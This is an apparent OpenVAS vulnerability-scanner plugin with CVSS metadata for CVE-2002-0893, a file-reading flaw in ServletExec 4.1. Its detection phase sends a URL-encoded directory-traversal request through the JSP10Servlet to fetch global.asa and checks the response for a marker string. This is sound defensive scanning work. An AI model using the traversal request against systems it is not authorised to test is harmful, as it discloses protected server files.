CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
75.1%
By invoking the JSPServlet directly, it is possible to read the contents of
files within the webroot that would not normally be accessible (for example, global.asa).
# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
  # Registration phase: everything in this block only declares metadata for
  # the scanner; no traffic is sent to the target from here.

  # Identity and revision of this test.
  script_oid("1.3.6.1.4.1.25623.1.0.10959");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");

  # Severity: CVSS v2 base score 5.0. The vector describes a network-reachable,
  # low-complexity, unauthenticated issue whose only impact is a partial loss
  # of confidentiality (file disclosure), with no integrity or availability impact.
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");

  script_cve_id("CVE-2002-0893");

  script_name("ServletExec 4.1 ISAPI File Reading");

  # ACT_ATTACK: the detection part of this script actively requests the file
  # from the target instead of inferring the flaw from a version string.
  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2002 Matt Moore");
  script_family("Web application abuses");

  # Scheduling: run after service/HTTP discovery, only against web ports, and
  # not at all when the "Settings/disable_cgi_scanning" key is set.
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  # References: vendor patch location, BID entry and the original advisory.
  script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
  script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");

  # Remediation text shown with a finding.
  script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");

  # The two multi-line values below keep their continuation lines at column 0
  # on purpose: any leading whitespace would become part of the reported text.
  script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example.)");

  script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
are returned. Text files can generally be read without problem.");

  # Quality-of-detection class and the kind of fix available.
  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  # End of the registration phase.
  exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
# Detection phase: request one well-known file through the servlet path and
# report a finding only if its contents come back.

# HTTP port to test; 80 is passed as the default.
port = http_get_port(default:80);

# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
# The path addresses the JSP10Servlet directly and appends two URL-encoded
# backslash ("%5c") parent-directory segments before the file name.
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";

# Build the GET request and send it over the (possibly kept-alive) connection.
res = http_keepalive_send_recv(port:port, data:http_get(item:url, port:port));

# No response at all: nothing can be concluded about this host.
if(!res)
  exit(0);

# The marker is a string expected inside a global.asa file; ">!<" is the
# "does not contain" form of the substring operator.
# NOTE(review): the match is a literal, case-sensitive substring test, so a
# global.asa that writes the tag in another case or quotes the attribute value
# is not recognised. This exit is also reached when the site simply has no
# global.asa in the probed location, so a clean result from this check does
# not by itself show that the vendor patch is installed - confirm the patch
# level separately.
if("OBJECT RUNAT=Server" >!< res)
  exit(99);

# Marker found: the protected file was served. Report the URL that returned it.
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);